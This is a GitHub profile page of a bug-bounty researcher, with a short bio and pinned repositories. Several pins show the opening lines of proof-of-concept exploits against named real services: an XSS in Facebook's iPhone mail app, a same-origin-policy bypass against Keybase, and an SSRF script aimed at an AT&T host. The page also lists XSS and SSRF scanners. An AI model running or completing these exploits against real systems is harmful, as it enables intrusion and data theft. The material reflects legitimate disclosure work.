Skip to content
View streghstreek's full-sized avatar
🍺
Drink with me!
🍺
Drink with me!

Organizations

@BugHunterID @pwn0sec @EddieHubCommunity @TirtharajSinhaDevCommunity

Block or report streghstreek

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse
streghstreek/README.md

[

     


Hey there 👋,

I love to learn about building and finding security flaws in Web and Mobile Applications.Cloud Infra is also a great area where I'm currently understanding how things work and how security issues can arise if not handled proprely.I also do bug bounties sometimes which helps to test real world systems and applications on how they are designed & built and produce serious impactful issues. I have been also doing CTF's with my team. Pwn0sec

Blogs

💌 I publish writeups and techical findings

⚡ Fun fact:

Learn by doing is an easy way to learn something

Stats

Naereen's github stats Most used languages

Pinned Loading

  1. iPhone app XSS in Facebook Mail iPhone app XSS in Facebook Mail
    1
    <script type="text/javascript" src="http://www.online24.nl/static/assets/js/jquery-1.4.4.min.js"></script>
    2
    <script type="text/javascript">
    3
        // http://iphone.facebook.com/photo_dashboard.php?endtime=1311780199&__ajax__&__metablock__=9
    4
        $(function(){
    5
            parse_messages = function()
  2. SOP bypass using browser cache (http... SOP bypass using browser cache (https://hackerone.com/reports/761726)
    1
    <html>
    2
    <script>  
    3
    var url = "https://keybase.io/_/api/1.0/user/lookup.json?username={YOUR_USERNAME}";  
    4
    fetch(url, {    
    5
        method: 'GET',    
  3. PwnSSRF PwnSSRF Public

    Forked from pwn0sec/PwnSSRF

    A Python based scanner to find potential SSRF parameters in a web application.

    Python

  4. pwn0sec/PwnXSS pwn0sec/PwnXSS Public

    PwnXSS: Vulnerability (XSS) scanner exploit

    Python 746 140

  5. pwn0sec/Pwnscan pwn0sec/Pwnscan Public

    Shalfa is a simple tool that helps you with Extract URLs.

    Python 9 2

  6. ATT Exploiting SSRF ATT Exploiting SSRF
    1
    import requests
    2
    
                  
    3
    url = "https://onlinefaxtwo.att.com/loa.php"
    4
    
                  
    5